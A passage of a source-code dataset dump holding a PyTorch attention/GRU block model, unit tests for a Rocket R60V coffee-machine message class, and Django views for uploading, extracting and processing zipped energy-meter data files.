'department_name',\n\t\t)\n\n","repo_name":"cruithne-2292/project","sub_path":"app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74582759130","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.distributions.categorical import Categorical\r\n\r\n### Add block model components\r\nfrom models.attention_model import BaseModel\r\n\r\n\r\n# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py\r\ndef init_params(m):\r\n classname = m.__class__.__name__\r\n if classname.find(\"Linear\") != -1:\r\n m.weight.data.normal_(0, 1)\r\n m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))\r\n if m.bias is not None:\r\n m.bias.data.fill_(0)\r\n\r\nclass Block_model(nn.Module):\r\n def __init__(self, input_dim, top_k, block_hid_dim, att_layer_num, norm_type, device, bl_log_sig_min,\r\n bl_log_sig_max):\r\n super().__init__()\r\n\r\n self.input_dim = input_dim #64 (hs+hr+ha)\r\n\r\n ### Block latent variable(embedding) dimension\r\n self.block_hid_dim = block_hid_dim # 256\r\n self.block_mu_size = 64\r\n\r\n ### Attention selection\r\n self.top_k = top_k\r\n\r\n self.device = device\r\n self.bl_log_sig_min = bl_log_sig_min\r\n self.bl_log_sig_max = bl_log_sig_max\r\n\r\n activation = nn.Tanh()\r\n # activation = nn.ReLU()\r\n\r\n # Define block memory\r\n ## Blockwise RNN. For simplicity, we use GRU.
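## The per-step input is the top_k selected attention outputs concatenated together (size input_dim * top_k); forward() below feeds it as a length-1 sequence, so each call folds one chunk into the block memory.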
However, LSTM can also be applied.\r\n #self.block_memory_rnn = nn.GRUCell(self.input_dim * self.top_k, self.block_hid_dim)\r\n self.block_memory_rnn = nn.GRU(input_size = self.input_dim * self.top_k,\r\n hidden_size = self.block_hid_dim,\r\n num_layers = 1,\r\n )\r\n\r\n ## Define Self-attention\r\n ## Note that the output dimension of self-attention is the same as input dimension due to Residual connection.\r\n ## 4 multi-heads\r\n self.att_model_q = BaseModel(hidden_dim=self.input_dim, num_layers=att_layer_num,\r\n norm_type=norm_type)\r\n\r\n ## Define mean of encoder\r\n self.block_mu = nn.Sequential(\r\n nn.Linear(self.block_hid_dim, self.block_hid_dim // 2),\r\n activation,\r\n nn.Linear(self.block_hid_dim // 2, self.block_mu_size)\r\n )\r\n\r\n ## Define stddev of decoder\r\n self.block_sig = nn.Sequential(\r\n nn.Linear(self.block_hid_dim, self.block_hid_dim // 2),\r\n activation,\r\n nn.Linear(self.block_hid_dim // 2, self.block_mu_size),\r\n # nn.Softplus()\r\n )\r\n\r\n ## Define p_theta model for self-normalized importance sampling\r\n self.self_norm_model = nn.Sequential(\r\n nn.Linear(self.input_dim * self.top_k + self.block_mu_size, self.input_dim),\r\n activation,\r\n nn.Linear(self.input_dim, 1)\r\n )\r\n\r\n # Initialize parameters correctly\r\n self.apply(init_params)\r\n\r\n def forward(self, obs_block_ori, block_memory_ori):\r\n ## obs_block_ori: [ seq=L, batch=16, 64(feature)]\r\n ## block_memory_ori: [16, self.block_hid_dim=256]\r\n\r\n\r\n obs_block = obs_block_ori.clone()\r\n #print(\"obs_block\", obs_block.shape)\r\n assert len(obs_block.size()) == 3\r\n\r\n block_memory = block_memory_ori.clone()\r\n #print(\"block_memory (hidden)\", block_memory.shape)\r\n assert len(block_memory.size()) == 3\r\n\r\n # print(\"block_memory first\", block_memory_ori)\r\n\r\n # Step 1. input obs and action to Attention for model_q.\r\n # Then select some of them. 
Default is to choose 2 ends like bi-LSTM (block_len >=2).\r\n # Later, we are going to choose 'self.trans_select_N' number of outputs based on Attention score.\r\n\r\n trans_q_output, attention_matrix = self.att_model_q.forward(obs_block) # (seq, batch_size=4, 64)\r\n trans_q_output = trans_q_output.permute(1, 0, 2) # (batch=4, seq, 256)\r\n # print(\"trans_q_output\", trans_q_output, trans_q_output.shape) # (batch, seq, hidden_dim=64)\r\n # print(\"attention\", attention_matrix, attention_matrix.shape) # (batch*n_head, trans_seq, trans_seq)\r\n\r\n attention_matrix_align = torch.cat(attention_matrix.split(obs_block.size()[1], dim=0),\r\n 2) # (batch, trans_seq, trans_seq*n_head)\r\n\r\n ### Pass top K elements\r\n batch_here = trans_q_output.shape[0]\r\n seq_len_here = trans_q_output.shape[1]\r\n\r\n _, top_k_index = torch.topk(attention_matrix_align.sum(dim=-1), k=min(self.top_k, seq_len_here), dim=-1)\r\n\r\n top_k_index_repeat = top_k_index.unsqueeze(dim=-1).repeat(1, 1, trans_q_output.shape[2])\r\n # (batch, min(self.top_k, trans_q_output.shape[1]), 256)\r\n top_k_q_output_selected = torch.gather(trans_q_output, dim=1, index=top_k_index_repeat) # selected vectors\r\n # (batch, min(self.top_k, trans_q_output.shape[1]), 256)\r\n\r\n reshaped = torch.reshape(top_k_q_output_selected,\r\n (batch_here, -1)) # (batch, min(self.top_k, trans_q_output.shape[1])*256)\r\n # print(\"reshaped init\", reshaped, reshaped.shape) Y_ns\r\n\r\n ## Padding if necessary\r\n if seq_len_here < self.top_k:\r\n zero_pad = torch.zeros((batch_here, (self.top_k - seq_len_here) * trans_q_output.shape[2]),\r\n device=self.device)\r\n reshaped = torch.cat((reshaped, zero_pad), dim=-1) # (batch, self.top_k*256)\r\n\r\n # Step 2. Here, 'block_memory' should be changed to block_variable recurrently.\r\n reshaped = reshaped.unsqueeze(dim=0) #the input sequence(Y) length is always 1\r\n #print('reshaped(input)', reshaped.shape)\r\n #print('block_memory', block_memory.shape)\r\n\r\n output, hidden = self.block_memory_rnn(reshaped, block_memory) # (batch, hidden=256),\r\n\r\n #print('output', output.shape)\r\n #print('hidden', hidden.shape)\r\n\r\n return output, hidden\r\n #block_memory_ori = block_memory\r\n #return block_memory_ori, reshaped\r\n\r\n\r\n\r\n def block_mu_sig(self, block_memory):\r\n sig = torch.exp(self.block_sig(block_memory).clamp(self.bl_log_sig_min, self.bl_log_sig_max))\r\n\r\n return torch.cat((self.block_mu(block_memory), sig), dim=-1)","repo_name":"suyoung-lee/SDVT","sub_path":"models/block_model.py","file_name":"block_model.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"19158369073","text":"#!/usr/bin/env python\n# pylint: disable=no-self-use,unused-argument\n'''\nUnit test cases for the Rocket message module.\n'''\n\n__all__ = (\n 'TestMessage',\n)\n\nimport logging\nfrom unittest import TestCase, main\n\nfrom rocket_r60v.message import Message\nfrom rocket_r60v.exceptions import MessageLengthError\n\nlogging.disable()\n\n\nclass TestMessage(TestCase):\n '''\n Test rocket.machine.Machine class and its methods.\n '''\n\n def _test_message(self, expected, **kwargs):\n '''\n Test if created message instance matches the expected message format.\n '''\n message = Message(**kwargs)\n\n self.assertEqual(expected, str(message), 'Mismatch of string representation')\n self.assertEqual(expected, message.raw_message, 'Mismatch of raw message w/ checksum')\n self.assertEqual(expected[0:-2], 
message.message, 'Mismatch of message w/o checksum')\n self.assertEqual(expected[0:9], message.envelope, 'Mismatch of envelope')\n self.assertEqual(expected[0], message.command, 'Mismatch of command')\n self.assertEqual(int(expected[1:5], 16), message.address, 'Mismatch of address')\n self.assertEqual(int(expected[5:9], 16), message.length, 'Mismatch of length')\n self.assertEqual(expected[9:-2], message.data, 'Mismatch of data')\n self.assertEqual(expected.encode(), message.encode(), 'Mismatch of encoded message')\n\n def test_read_from_first_address(self):\n '''\n Read from the first address.\n '''\n self._test_message(\n expected='r00010001F4',\n command='r',\n address=1,\n length=1\n )\n\n def test_read_from_tenth_address(self):\n '''\n Read from the tenth address.\n '''\n self._test_message(\n expected='r000A000104',\n command='r',\n address=10,\n length=1\n )\n\n def test_write_list_data_to_first_address(self):\n '''\n Write to the first address with a list of data.\n '''\n self._test_message(\n expected='w00010001015A',\n command='w',\n address=1,\n length=1,\n data=[1]\n )\n\n def test_write_int_data_to_first_address(self):\n '''\n Write to the first address with an int as data.\n '''\n self._test_message(\n expected='w00010001015A',\n command='w',\n address=1,\n length=1,\n data=1\n )\n\n def test_write_str_data_to_first_address(self):\n '''\n Write to the first address with a str as data.\n '''\n self._test_message(\n expected='w00010001015A',\n command='w',\n address=1,\n length=1,\n data='1'\n )\n\n def test_write_list_data_to_sixth_address(self):\n '''\n Write to the sixth address with a list of data.\n '''\n self._test_message(\n expected='w003C0001106F',\n command='w',\n address=60,\n length=1,\n data=[16]\n )\n\n def test_write_int_data_to_sixth_address(self):\n '''\n Write to the sixth address with an int as data.\n '''\n self._test_message(\n expected='w003C0001106F',\n command='w',\n address=60,\n length=1,\n data=16\n )\n\n def test_write_str_data_to_sixth_address(self):\n '''\n Write to the sixth address with a str as data.\n '''\n self._test_message(\n expected='w003C0001106F',\n command='w',\n address=60,\n length=1,\n data='16'\n )\n\n def test_write_long_list_data(self):\n '''\n Write a long list of data with matching length.\n '''\n self._test_message(\n expected='w003C00040A141E28C7',\n command='w',\n address=60,\n length=4,\n data=[10, 20, 30, 40]\n )\n\n def test_write_too_short_list_data(self):\n '''\n Write a too short list of data.\n '''\n with self.assertRaises(MessageLengthError):\n Message(\n command='w',\n address=60,\n length=4,\n data=[10, 20, 30]\n )\n\n def test_write_too_long_list_data(self):\n '''\n Write a too long list of data.\n '''\n with self.assertRaises(MessageLengthError):\n Message(\n command='w',\n address=60,\n length=4,\n data=[10, 20, 30, 40, 50]\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"confirm/Rocket-R60V","sub_path":"rocket_r60v/tests/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"4724323857","text":"from django.shortcuts import render\nimport json\nfrom django.core import serializers\nimport os\nimport zipfile\nfrom django.conf import settings\nfrom datetime import datetime\nimport shutil\nimport pandas as pd\n# Create your views here.\nfrom django.core.files import File\n\nfrom django.http import HttpResponse\nfrom django.http
import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n# from .serializers import AllMeterFilesSerializer\n\nfrom .models import *\nfrom .extract import dirJsonNPC\nfrom .merge import mergeNPCs\nfrom .dateFilter import dateFilterMergedFile\nfrom .validate import validateFile\nfrom .realMeterMWH import createRealMeterMWH\nfrom .frequencyGraphData import frequencyGraphData\nfrom .fictMeterMWH import createFictMeterMWH\nfrom .finalOutput import createFinalOutput\nfrom .analyseData import fetchData\nfrom .changeMeterDataAnalyse import changeMeterEndDataWithEquation,revertMeterEndChanges,zeroFillMeter\nfrom .componentWiseAnalysis import componentWiseMeterAnalysis\nfrom .specialReports import specialReport1\n\n\nfrom .supportingFunctions import *\nfrom django.core.files.storage import FileSystemStorage\n\nclass OverwriteStorage(FileSystemStorage):\n def get_valid_name(self, name):\n # return get_valid_filename(name)\n return name\n def get_available_name(self, name,max_length=None):\n if self.exists(name):\n print(name)\n os.remove(os.path.join(settings.MEDIA_ROOT, name))\n return name\n\ndef meterChangeLog(file_name, text_to_append):\n \"\"\"Append given text as a new line at the end of file\"\"\"\n # Open the file in append & read mode ('a+')\n with open(file_name, \"a+\") as file_object:\n # Move read cursor to the start of file.\n file_object.seek(0)\n # If file is not empty then append '\\n'\n data = file_object.read(100)\n if len(data) > 0:\n file_object.write(\"\\n\")\n # Append text at the end of file\n file_object.write(text_to_append)\n\n######################### Testing ##########################################################################\ndef index(request):\n return HttpResponse(\"Hello, world. 
You're at the polls index.\")\n\n@api_view(['GET'])\ndef apiOverview(request):\n\tapi_urls = {\n\t\t'List':'/task-list/',\n\t\t'Detail View':'/task-detail//',\n\t\t'Create':'/task-create/',\n\t\t'Update':'/task-update//',\n\t\t'Delete':'/task-delete//',\n\t\t}\n\n\treturn Response(api_urls)\n\n####################### Zipped Meter Data ####################################################################\n@csrf_exempt\ndef getAllMeterData(request):\n # AllMeterFiles_json = AllMeterFiles.objects.all()\n AllMeterFiles_json = serializers.serialize(\"json\", AllMeterFiles.objects.all().order_by('-id'))\n \n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(AllMeterFiles_json, content_type=\"text/json-comment-filtered\")\n\n@csrf_exempt\ndef getMeterData(request, meter_id): # Data of single meter\n meterData = AllMeterFiles.objects.filter(id=int(meter_id))\n meterData_json = serializers.serialize(\"json\", meterData)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(meterData_json, content_type=\"text/json-comment-filtered\")\n\n@csrf_exempt\ndef addNewMeterFile(request):\n print(\"I have request object\")\n print(request.POST['year'])\n print(request.POST['month'])\n print(request.POST['startDate'])\n print(request.POST['endDate'])\n print(datetime.strptime(request.POST['startDate'], \"%d-%m-%Y\"))\n print(datetime.strptime(request.POST['endDate'], \"%d-%m-%Y\"))\n\n # print(request.POST['meterZippedFile'].name)\n\n year = request.POST['year']\n month = request.POST['month']\n startDate = datetime.strptime(request.POST['startDate'], \"%d-%m-%Y\")\n endDate = datetime.strptime(request.POST['endDate'], \"%d-%m-%Y\")\n meterZippedFile = request.FILES['meterZippedFile']\n\n meterData = AllMeterFiles.objects.create(year=year, month=month,status = \"Uploaded\", startDate=startDate, endDate=endDate)\n meterData.save()\n meterData.zippedMeterFile = meterZippedFile\n meterData.save()\n\n return HttpResponse(json.dumps({'id' : meterData.id, 'message': 'MeterFile added'}), content_type='application/json')\n\n@csrf_exempt\ndef deleteNewMeterFile(request,meter_id):\n print(meter_id)\n AllMeterFiles.objects.get(id=int(meter_id)).delete()\n return HttpResponse({'message': 'Meter deleted'}, status=200)\n\n########################### Extract ##########################################################################\n\n@csrf_exempt\ndef getNPCData(request, meter_id): # Data of single meter\n\n print(\"inside getNPCData\")\n print(meter_id)\n\n npcFiles = list(filter(lambda npcFile: (npcFile.npcFileMeterId() == meter_id),NpcFile.objects.all()))\n # npcFile = npcFiles[0]\n # npcDict = json.loads(npcFile.npcDictionary)\n # print(npcDict[\"1\"])\n npcFiles_json = serializers.serialize(\"json\", npcFiles , fields=('dirStructureNPC','meterFile'))\n \n return HttpResponse(npcFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n\n\n@csrf_exempt\ndef extract(request,meter_id):\n \n try :\n print(\"inside extract\")\n\n print(\"meter_id\")\n print(meter_id)\n meterData = AllMeterFiles.objects.get(id=meter_id)\n print(meterData.zippedMeterFile)\n # zipFilePath = os.path.join(\"fifteenmmdp/media/\",str(meterData.zippedMeterFile))\n # npcFilesFolderPath = os.path.join(\"fifteenmmdp/media/meterFile/meterFile\"+meter_id,'NPC Files',os.path.basename(str(meterData.zippedMeterFile)))\n npcFilesFolderPath = os.path.join(\"fifteenmmdp/media/meterFile/meterFile\"+meter_id,'NPC Files')\n\n # print(os.path.splitext(zipFilePath)) # 
('fifteenmmdp/media/meterFile/meterFile29/test', '.zip')\n print(npcFilesFolderPath)\n print(os.path.splitext(npcFilesFolderPath)) # ('meterFile/meterFile29\\\\NPC Files\\\\test', '.zip')\n\n with zipfile.ZipFile('fifteenmmdp/media/'+ str(meterData.zippedMeterFile), 'r') as zip_ref:\n # zip_ref.extractall(\"fifteenmmdp/media/meterFile/meterFile\"+ meter_id)\n zip_ref.extractall(\"fifteenmmdp/media/meterFile/meterFile\"+ meter_id +\"/NPC Files\")\n\n\n if(not (meterData.status is None) and (statusCodes.index(meterData.status) == 0)) :\n shutil.copytree('fifteenmmdp/media/necessaryFiles', \"fifteenmmdp/media/meterFile/meterFile\"+ meter_id +\"/NPC Files/Necessary Files Local Copy\")\n\n\n print(\"Extract executed\")\n\n npcDict = {'lastIndex' : 1}\n\n jsonOutput = dirJsonNPC(os.path.splitext(npcFilesFolderPath)[0],meterData,npcDict)\n print(json.dumps(jsonOutput))\n print(npcDict)\n\n npcFileObject = NpcFile.objects.create(npcDictionary = json.dumps(npcDict),dirStructureNPC=json.dumps(jsonOutput), meterFile = meterData)\n npcFileObject.save()\n\n AllMeterFiles.objects.filter(id = meter_id).update(status=\"Extracted\")\n return HttpResponse({'message': 'Meter File Extracted'}, status=200)\n except Exception as e :\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n\n\n# @csrf_exempt\n# def downloadNPCFile(request,npc_id):\n#\n# print(\"inside downloadNpcFile\")\n# print(npc_id)\n# npcFile = NpcFile.objects.get(id=int(npc_id))\n#\n#\n# outputFile_path = os.path.join(settings.MEDIA_ROOT,npcFile.filePath)\n# print(outputFile_path)\n#\n# if(os.path.exists(outputFile_path)) :\n# with open(outputFile_path, 'rb') as fh:\n# response = HttpResponse(fh.read(), content_type=\"text/plain\")\n# response['Content-Disposition'] = 'attachment; filename=' + npcFile.fileName\n# return response\n#\n# return HttpResponse(\"There is no NPC File to download\")\n\n\n@csrf_exempt\ndef downloadNPCFile(request,meter_id,npc_id): # Single File only\n\n print(\"inside downloadNPCFile\")\n print(npc_id)\n # npcFile = NpcFile.objects.get(id=int(npc_id))\n\n npcFiles = list(filter(lambda npcFile: (npcFile.npcFileMeterId() == meter_id),NpcFile.objects.all()))\n npcFile = npcFiles[0]\n npcDict = json.loads(npcFile.npcDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,npcDict[npc_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(npcDict[npc_id])\n return response\n\n return HttpResponse(\"There is no NPC File to download\")\n\n\n# @csrf_exempt\n# def changeNPCFile(request,npc_id):\n#\n# print(\"inside changeNPCFile\")\n# print(npc_id)\n#\n# print(request.FILES['fileToUpload'])\n# # npcFileToChange = NpcFile.objects.get(id = npc_id)\n# # npcFileToChange.npcFile = request.FILES['fileToUpload']\n# # npcFileToChange.save()\n# return HttpResponse({'message': 'NPC Changed'}, status=200)\n\n@csrf_exempt\ndef changeNPCFile(request,meter_id,npc_id):\n\n print(\"inside changeNPCFile\")\n print(npc_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n\n print(myfile)\n print(myfile.name)\n npcFiles = list(filter(lambda npcFile: (npcFile.npcFileMeterId() == meter_id),NpcFile.objects.all()))\n npcFile = npcFiles[0]\n npcDict = json.loads(npcFile.npcDictionary)\n print(npcDict[npc_id])\n # useThisLoc = 'fifteenmmdp/media'+npcDict[npc_id]\n useThisLoc = npcDict[npc_id]\n\n
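# OverwriteStorage (defined near the top of this module) first deletes any existing file with the same name, so the save() below keeps the exact path taken from npcDict instead of letting Django append a uniqueness suffix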
fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'NPCFile Changed'}, status=200)\n\n########################### Merge ##########################################################################\n@csrf_exempt\ndef merge(request,meter_id):\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n mergeError = mergeNPCs(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n if(len(mergeError) != 0) :\n return HttpResponse(json.dumps(mergeError), content_type='application/json',status=500)\n else :\n return HttpResponse({'message': 'NPCs Merged'}, status=200)\n \n\n@csrf_exempt\ndef getMergedFile(request,meter_id):\n\n print(\"inside getMergedFile\")\n print(meter_id)\n\n mergedFile = list(filter(lambda mergedFile: (mergedFile.mergedFileMeterId() == meter_id),MergedFile.objects.all()))\n \n mergedFile_json = serializers.serialize(\"json\", mergedFile)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(mergedFile_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downloadMergedFile(request,mergedFile_id):\n\n print(\"inside downloadMergedFile\")\n\n print(mergedFile_id)\n mergedFile = MergedFile.objects.get(id=int(mergedFile_id))\n\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,mergedFile.filePath)\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + mergedFile.fileName\n return response\n\n return HttpResponse(\"There is no Merged File to download\")\n\n@csrf_exempt\ndef changeMergedFile(request,mergedFile_id):\n\n print(\"inside changeMergedFile\")\n\n print(request.FILES['fileToUpload'])\n mergedFileToChange = MergedFile.objects.get(id = mergedFile_id)\n mergedFileToChange.mergedFile = request.FILES['fileToUpload']\n mergedFileToChange.save()\n print(mergedFile_id)\n return HttpResponse({'message': 'Merged File Changed'}, status=200)\n\n############################## Date Filter #####################################################################\n\n@csrf_exempt\ndef dateFilter(request,meter_id):\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n dateFilterError = dateFilterMergedFile(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n if(len(dateFilterError) != 0) :\n return HttpResponse(json.dumps(dateFilterError), content_type='application/json',status=500)\n else :\n #Need to fix \n return HttpResponse({'message': 'MergedFile DateFiltered'}, status=200)\n\n\n@csrf_exempt\ndef getDateFilteredFile(request,meter_id):\n\n print(\"inside getDateFilteredFile\")\n print(meter_id)\n\n dateFilteredFile = list(filter(lambda dateFilteredFile: (dateFilteredFile.dateFilteredFileMeterId() == meter_id),DateFilteredFile.objects.all()))\n \n dateFilteredFile_json = serializers.serialize(\"json\", dateFilteredFile)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(dateFilteredFile_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downloadDateFilteredFile(request,dateFilteredFile_id):\n\n print(\"inside downloadDateFilteredFile\")\n\n print(dateFilteredFile_id)\n dateFilteredFile = 
DateFilteredFile.objects.get(id=int(dateFilteredFile_id))\n\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,dateFilteredFile.filePath)\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + dateFilteredFile.fileName\n return response\n\n return HttpResponse(\"There is no DateFiltered File to download\")\n\n@csrf_exempt\ndef changeDateFilteredFile(request,dateFilteredFile_id):\n\n print(\"inside changeDateFiltered\")\n\n print(request.FILES['fileToUpload'])\n dateFilteredFileToChange = DateFilteredFile.objects.get(id = dateFilteredFile_id)\n dateFilteredFileToChange.dateFilteredFile = request.FILES['fileToUpload']\n dateFilteredFileToChange.save()\n print(dateFilteredFile_id)\n return HttpResponse({'message': 'DateFiltered File Changed'}, status=200)\n\n@csrf_exempt\ndef downloadNrxFile(request,meter_id):\n\n print(\"inside downloadNrxFile\")\n\n print(meter_id)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id+\"/DateFiltered File/NRXFile.NRX\")\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + 'NRXFile.NRX'\n return response\n\n return HttpResponse(\"There is no NRX File to download\")\n\n############################ Validate ##############################################################################\n\n@csrf_exempt\ndef validate(request,meter_id):\n try :\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n valiDateError = validateFile(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n if(len(valiDateError) != 0) :\n return HttpResponse(json.dumps(valiDateError), content_type='application/json',status=500)\n else :\n #Need to fix \n return HttpResponse({'message': 'MergedFile Validated'}, status=200)\n except Exception as e :\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n\n@csrf_exempt\ndef getValidatedFile(request,meter_id):\n\n print(\"inside getValidatedFile\")\n print(meter_id)\n\n validatedFile = list(filter(lambda validatedFile: (validatedFile.validatedFileMeterId() == meter_id),ValidatedFile.objects.all()))\n \n validatedFile_json = serializers.serialize(\"json\", validatedFile)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(validatedFile_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downloadValidatedFile(request,validatedFile_id):\n\n print(\"inside downloadValidatedFile\")\n\n print(validatedFile_id)\n validatedFile = ValidatedFile.objects.get(id=int(validatedFile_id))\n\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,validatedFile.filePath)\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + validatedFile.fileName\n return response\n\n return HttpResponse(\"There is no Validated File to download\")\n\n@csrf_exempt\ndef changeValidatedFile(request,validatedFile_id):\n\n print(\"inside changeValidatedFile\")\n\n print(request.FILES['fileToUpload'])\n validatedFileToChange = 
ValidatedFile.objects.get(id = validatedFile_id)\n validatedFileToChange.validatedFile = request.FILES['fileToUpload']\n validatedFileToChange.save()\n print(validatedFile_id)\n return HttpResponse({'message': 'Validated File Changed'}, status=200)\n\n\n############################## Create Real Meter MWH #################################################################\n\n@csrf_exempt\ndef getRealMeterMWHData(request, meter_id): # Data of single meter\n\n print(\"inside getRealMeterMWHData\")\n print(meter_id)\n\n realMeterMWHFiles = list(filter(lambda realMeterMWHFile: (realMeterMWHFile.realMeterMWHFileMeterId() == meter_id),RealMeterMWHFile.objects.all()))\n # realMeterMWHFile = realMeterMWHFiles[0]\n # mwhDict = json.loads(realMeterMWHFile.mwhDictionary)\n # print(mwhDict[\"1\"])\n realMeterMWHFiles_json = serializers.serialize(\"json\", realMeterMWHFiles , fields=('dirStructureRealMWH','meterFile'))\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(realMeterMWHFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef realMeterMWH(request,meter_id,overWrite):\n # try :\n print(meter_id)\n if(overWrite == \"false\") :\n print(\"Keep file as it is\")\n else :\n shutil.rmtree(os.path.join(\"fifteenmmdp/media/meterFile\",\"meterFile\"+meter_id,\"Real Meter MWH Files(Copy)\"))\n print(\"overwrite the files\")\n print(type(overWrite))\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n createRealMeterMWH(path = \"meterFile\"+meter_id, _meterData = meterFile, overWrite = overWrite) #Path given\n return HttpResponse({'message': 'Real Meter MWH Created'}, status=200)\n # except Exception as e :\n # return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef downloadRealMeterMWHFile(request,meter_id,realMeterMWH_id): # Single File only\n\n print(\"inside downloadRealMeterMWHFile\")\n print(realMeterMWH_id)\n # realMeterMWHFile = RealMeterMWHFile.objects.get(id=int(realMeterMWH_id))\n\n realMeterMWHFiles = list(filter(lambda realMeterMWHFile: (realMeterMWHFile.realMeterMWHFileMeterId() == meter_id),RealMeterMWHFile.objects.all()))\n realMeterMWHFile = realMeterMWHFiles[0]\n mwhDict = json.loads(realMeterMWHFile.mwhDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,mwhDict[realMeterMWH_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(mwhDict[realMeterMWH_id])\n return response\n\n return HttpResponse(\"There is no Real Meter MWH File to download\")\n\n\n@csrf_exempt\ndef changeRealMeterMWHFile(request,meter_id,realMeterMWH_id):\n\n print(\"inside changeRealMeterMWHFile\")\n print(realMeterMWH_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange = RealMeterMWHFile.objects.get(id = realMeterMWH_id)\n print(myfile)\n print(myfile.name)\n realMeterMWHFiles = list(filter(lambda realMeterMWHFile: (realMeterMWHFile.realMeterMWHFileMeterId() == meter_id),RealMeterMWHFile.objects.all()))\n realMeterMWHFile = realMeterMWHFiles[0]\n mwhDict = json.loads(realMeterMWHFile.mwhDictionary)\n print(mwhDict[realMeterMWH_id])\n # useThisLoc = 'fifteenmmdp/media'+mwhDict[realMeterMWH_id]\n useThisLoc = mwhDict[realMeterMWH_id]\n\n fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # 
realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'RealMeterMWHFile Changed'}, status=200)\n\n@csrf_exempt\ndef downLoadFullRealMeterMWHFiles(request,meter_id):\n print(\"inside downLoadFullRealMeterMWHFiles\")\n print(meter_id)\n\n path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id)\n inputFile_path = os.path.join(path,'Real Meter MWH Files')\n outputFile_path = os.path.join(path,'Real_Meter_MWH.zip')\n\n shutil.make_archive(os.path.splitext(outputFile_path)[0], 'zip', inputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + 'Real_Meter_MWH.zip'\n return response\n\n return HttpResponse(\"There is no Real Meter MWH File to download\")\n\n@csrf_exempt\ndef fetchFrequencyGraphData(request, meter_id) :\n print(\"i am in fetchFrequencyGraphData\")\n\n frequencyGraphDataToSend = frequencyGraphData(path = \"meterFile\"+meter_id) 